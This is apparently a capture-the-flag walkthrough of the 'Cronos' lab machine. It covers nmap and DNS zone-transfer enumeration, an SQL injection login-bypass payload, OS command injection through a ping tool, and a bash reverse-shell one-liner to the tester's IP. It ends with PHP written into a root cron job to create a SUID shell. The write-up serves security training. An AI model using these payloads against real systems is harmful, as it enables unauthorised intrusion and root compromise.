Cronos

Published: Mar 21, 2025

Enumeration

Scan

Starting off with a basic nmap scan: 

nmap -sC -sV -oN scans/detailed.nmap 10.10.10.13

Web

Port 80 is always a great place to start looking, but navigating to the website just shows a default Apache page.

DNS

Let’s see if we can pull some more useful information from the DNS server.
Using nslookup, find out the name of the nameserver: 

$ nslookup
> server 10.10.10.13
> 10.10.10.13

Now, we can use dig to perform a zone transfer and look for subdomains.

For those of you new to this topic, dig is the “Domain Information Grouper”, which is a command-line tool for querying DNS servers. Using the axfr (Authoritative Transfer) query type requests a full DNS zone transfer. This functionality is meant for replicating DNS records between servers, but we are using it here to learn more about our target. 

dig axfr @10.10.10.13 cronos.htb

Web (Again)

“admin.cronos.htb” looks the most interesting, so let’s take a look after adding it to /etc/hosts

Foothold

SQL Injection

When greeted with a login panel without having any credentials, it’s usually a good idea to try some SQL injection, attempting to submit SQL syntax to be interpreted by the backend server. In this case, one of the most basic forms of SQL Injection is successful.
The following payload bypasses the authentication mechanism by commenting out any sort of password validation. 

UserName: admin'-- -
Password: AnythingWorksHere

Custom Web App

After getting logged in, we are greeted with something that looks like a custom networking tool.

Trying the ping feature, it looks like it simply runs the OS command to ping the specified IP.
Here, I am using tcpdump and entering my own IP to see if it is actually working: 

sudo tcpdump -ni tun0 icmp

Command Injection

Since it seems to be running an OS command, we can try some basic OS command injection payloads, and see that even the most basic ones work: 

10.10.14.7; whoami

Abusing this OS command injection, we can get a reverse shell as www-data 

10.10.14.7; bash -c 'bash -i >& /dev/tcp/10.10.14.7/443 0>&1'

Privilege Escalation

Cron

Taking a look at the system-wide crontab, we see a non-default cron running as root every minute. Better yet, it’s running a PHP file owned by www-data

Since we can overwrite the file, we can write any PHP code, move it to /var/www/laravel/artisan, and it will execute every minute. I will opt for getting myself a SUID shell by using the following PHP code: 

<?php system("cp /bin/bash /tmp/bokkish; chmod 4775 /tmp/bokkish") ?>